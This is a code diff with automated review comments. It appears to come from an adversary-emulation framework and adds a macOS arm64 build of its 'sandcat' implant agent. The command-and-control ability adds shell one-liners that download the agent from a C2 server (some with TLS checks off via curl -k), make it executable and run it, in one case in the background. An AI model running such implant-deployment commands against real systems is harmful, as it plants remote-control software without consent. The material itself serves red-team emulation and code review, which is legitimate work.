diff --git a/.github/workflows/go.yml b/.github/workflows/go.yml
index 9c4a9434..f2d5941d 100644
--- a/.github/workflows/go.yml
+++ b/.github/workflows/go.yml
@@ -37,6 +37,15 @@ jobs:
 env:
 GOOS: darwin
 
+ - name: Build Darwin arm64
+ run: |
+ cd gocat
+ go build -o sandcat.go-darwin-arm64 -ldflags="-s -w" sandcat.go
+ file sandcat.go-darwin-arm64 && ls -al sandcat.go-darwin-arm64
+ env:
+ GOOS: darwin
+ GOARCH: arm64
+
 - name: Build Linux
 run: |
 cd gocat
diff --git a/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml b/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
index 1acb0489..baf24d8b 100644
--- a/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
+++ b/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
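Review bot: The new `Build Darwin arm64` step prints the `file` output but never checks it, so the job stays green even if the binary is built for the wrong architecture. Turning the print into an assertion, e.g. `file -b sandcat.go-darwin-arm64 | grep -q arm64` (`-b` keeps the file name, which itself contains "arm64", out of the match), would make the step fail on a mis-targeted build. The darwin/arm64 target also needs Go 1.16 or newer; the Go version this workflow installs is set outside the hunk and should be confirmed.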
@@ -44,6 +44,24 @@
 curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
 chmod +x #{agents.implant_name};
 ./#{agents.implant_name} -server $server -listenP2P -v
+ darwin-arm64:
+ sh:
+ command: |
+ server="#{app.contact.http}";
+ curl -s -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" $server/file/download > #{agents.implant_name};
+ chmod +x #{agents.implant_name};
+ ./#{agents.implant_name} -server $server -v
+ variations:
+ - description: Deploy as a blue-team agent instead of red
+ command: |
+ server="#{app.contact.http}";
+ agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+ nohup ./$agent -server $server -group blue &
+ - description: Download with a random name and start as a background process
+ command: |
+ server="#{app.contact.http}";
+ agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+ nohup ./$agent -server $server &
 linux:
 sh:
 command: |
diff --git a/docs/Sandcat-Details.md b/docs/Sandcat-Details.md
index 1d2a6bca..3d61261e 100644
--- a/docs/Sandcat-Details.md
+++ b/docs/Sandcat-Details.md
@@ -23,6 +23,7 @@ various use cases.
 ## Precompiled Binaries
 Precompiled agent binaries are located in the `payloads` directory and are referenced with the following filename:
 - `sandcat.go-darwin` compiled binary for Mac targets
+- `sandcat.go-darwin-arm64` compiled binary for Mac with ARM processor targets
 - `sandcat.go-linux` compiled binary for Linux targets
 - `sandcat.go-windows` compiled binary for Windows targets.
 
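Review bot: Both `variations` commands in the new `darwin-arm64` block call `curl -svkOJ`, and `-k` turns off TLS certificate verification for a download that is made executable and started on the following line. Where `#{app.contact.http}` is an HTTPS listener with a trusted certificate, drop `-k` (`curl -svOJ ...`) so the agent binary is only accepted from the authenticated server; otherwise add a comment stating that the transfer is unauthenticated and intended for isolated lab networks only. `$agent` is taken from the server-supplied `Content-Disposition` header and expanded unquoted, so `chmod +x "$agent"` and `nohup "./$agent" -server "$server" &` would keep an unexpected file name from being word-split. How the server handles the new `platform:darwin-arm64` header value is not part of this diff and should be confirmed.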
@@ -145,4 +146,4 @@ Additionally, if you want the C2 server to compile the agent with a built-in lis
 Example usage:
 - `includeProxyPeers:all` - include all peers, regardless of what proxy methods they are listening on
 - `includeProxypeers:SmbPipe` - only include peers listening for SMB pipe proxy traffic
-- `includeProxypeers:HTTP` - only include peers listening for HTTP proxy traffic.
\ No newline at end of file
+- `includeProxypeers:HTTP` - only include peers listening for HTTP proxy traffic.
diff --git a/update-agents.sh b/update-agents.sh
index f27823f7..2e843b31 100755
--- a/update-agents.sh
+++ b/update-agents.sh
@@ -5,6 +5,7 @@ function build() {
 GOOS=windows go build -o ../payloads/sandcat.go-windows -ldflags="-s -w" sandcat.go
 GOOS=linux go build -o ../payloads/sandcat.go-linux -ldflags="-s -w" sandcat.go
 GOOS=darwin go build -o ../payloads/sandcat.go-darwin -ldflags="-s -w" sandcat.go
+GOOS=darwin GOARCH=arm64 -o ../payloads/sandcat.go-darwin-arm64 -ldflags="-s -w" sandcat.go
 }
 cd gocat && build
 cd ..
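Review bot: The line added to `build()` in update-agents.sh is missing the `go build` command, so the shell treats `-o` as the program to run with `GOOS` and `GOARCH` set, and the arm64 payload is never produced. It should read `GOOS=darwin GOARCH=arm64 go build -o ../payloads/sandcat.go-darwin-arm64 -ldflags="-s -w" sandcat.go`. The top of the script is outside the hunk, so whether a failing command stops the run (for example via `set -e`) cannot be seen here; if it does not, the script would finish while leaving a stale or missing `sandcat.go-darwin-arm64` in `payloads`, which the documentation change in this commit lists as a shipped binary.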